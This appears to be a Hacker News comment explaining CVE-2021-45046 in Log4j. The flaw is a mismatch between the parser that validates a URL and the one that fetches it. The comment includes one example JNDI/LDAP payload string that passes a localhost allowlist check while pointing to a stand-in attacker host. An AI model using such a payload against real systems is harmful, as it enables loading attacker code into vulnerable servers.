Hacker Newsnew | past | comments | ask | show | jobs | submitlogin

I didn't look into this in detail at the time, but the report's summary of CVE-2021-45046 is that the parser that validated an URL behaved differently than a separate parser used to fetch the URL, so an URL like

    jndi:ldap://127.0.0.1#.evilhost.com:1389/a
is validated as 127.0.0.1, which may be whitelisted, but fetched from evilhost.com, which probably isn't.


Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: